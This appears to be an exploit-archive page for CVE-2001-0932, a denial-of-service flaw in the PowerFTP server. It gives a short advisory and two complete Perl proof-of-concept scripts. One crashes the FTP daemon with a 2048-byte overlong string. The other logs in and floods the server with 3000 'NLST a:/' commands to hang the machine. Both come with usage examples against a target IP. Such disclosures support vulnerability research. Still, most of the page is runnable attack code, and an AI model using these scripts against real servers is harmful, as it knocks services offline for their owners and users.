CVE-2001-0932_Cooolsoft_PowerFTP拒絕服務漏洞

# CVE-2001-0932 Cooolsoft PowerFTP拒絕服務漏洞
==INFO1==

source: http://www.securityfocus.com/bid/3595/info


PowerFTP is a commercial FTP server for Microsoft Windows 9x/ME/NT/2000/XP operating systems. It is maintained by Cooolsoft.

Multiple instances of denial of service vulnerabilities exist in PowerFTP's FTP daemon. This is achieved by connecting to a vulnerable host and submitting an unusally long string of arbitrary characters.

It has been reported that this issue may also be triggered by issuing an excessively long FTP command of 2050 bytes or more.

This issue may is most likely due to a buffer overflow. If this is the case, there is a possibility that arbitrary code may be executed on the vulnerable host. However, this has not yet been confirmed. 

#!/usr/bin/perl
# Simple script to send a long 'A^s' command to the server, 
# resulting in the ftpd crashing
#
# PowerFTP Server v2.03 proof-of-concept exploit
# By Alex Hernandez  (C)2001.
#
# Thanks all the people from Spain and Argentina.
# Special Greets: White-B, Pablo S0r, Paco Spain, L.Martins, 
# G.Maggiotti & H.Oliveira.
# 
#
# Usage: perl -x PowerFTP_Dos.pl -s 
#
# Example: 
#
# perl -x PowerFTP_Dos.pl -s 10.0.0.1
# 220 Personal FTP Server ready
# Crash was successful !
#

use Getopt::Std;
use IO::Socket;

print("\nPowerFTP server v2.03 DoS exploit (c)2001\n");
print("Alex Hernandez al3xhernandez\@ureach.com\n\n");

getopts('s:', \%args);
if(!defined($args{s})){&usage;}
$serv = $args{s};
$foo = "A"; $number = 2048; 
$data .= $foo x $number; $EOL="\015\012";

$remote = IO::Socket::INET->new(
                    Proto => "tcp",
                    PeerAddr => $args{s},
                    PeerPort => "ftp(21)",
                ) || die("Unable to connect to ftp port at $args{s}\n");

$remote->autoflush(1);
print $remote "$data". $EOL;
while (<$remote>){ print }
print("\nCrash was successful !\n");


sub usage {die("\nUsage: $0 -s \n\n");}

==INFO2==

source: http://www.securityfocus.com/bid/3595/info
 
 
PowerFTP is a commercial FTP server for Microsoft Windows 9x/ME/NT/2000/XP operating systems. It is maintained by Cooolsoft.
 
Multiple instances of denial of service vulnerabilities exist in PowerFTP's FTP daemon. This is achieved by connecting to a vulnerable host and submitting an unusally long string of arbitrary characters.
 
It has been reported that this issue may also be triggered by issuing an excessively long FTP command of 2050 bytes or more.
 
This issue may is most likely due to a buffer overflow. If this is the case, there is a possibility that arbitrary code may be executed on the vulnerable host. However, this has not yet been confirmed. 

#!/usr/bin/perl
#
# Even though the server will deny access, the slow hardware 
# will still hang the machine. This program attempts to 
# exploit this weakness by sending the 'NLST a:/' command to 
# the server 
#
# PowerFTP Server v2.03 proof-of-concept exploit
# By Alex Hernandez  (C)2001.
#
# Thanks all the people from Spain and Argentina.
# Special Greets: White-B, Pablo S0r, Paco Spain, L.Martins,
# G.Maggiotti & H.Oliveira.
# 
#
# Usage: perl -x PowerFTP_floppy.pl    
#
# Example: 
#
# perl -x PowerFTP_floppy.pl 10.0.0.1 21 temp temp
# 

use IO::Socket;

print("\nPowerFTP server v2.03 DoS exploit Floppy (c)2001\n");
print("Alex Hernandez al3xhernandez\@ureach.com\n\n");

#$NUMBER_TO_SEND = 3000; 
$BUFF = 3000; 

if ( scalar @ARGV < 4 ) {
    print "Usage: $0    \n";
    exit();
}


$target = $ARGV[ 0 ];
$port = $ARGV[ 1 ];
$username = $ARGV[ 2 ];
$password = $ARGV[ 3 ];

print "Creating socket... ";
$sock = new IO::Socket::INET( PeerAddr => $target,
                              PeerPort => int( $port ), 
                                Proto => 'tcp' );
die "$!" unless $sock;
print "done.\n";


read( $sock, $buffer, 1 );


print "Sending username...";
print $sock "USER " . $username . "\n";
read( $sock, $buffer, 1 );
print "done.\n";


print "Sending password...";
print $sock "PASS " . $password . "\n";
read( $sock, $buffer, 1 );
print "done.\n";


print "DoS Attack floppy server...";
for( $i = 0; $i < $BUFF; $i++ ) {

    print $sock "NLST a:/\n";   
    read( $sock, $buffer, 1 );
}

print "done.\n";

close( $sock );
exit();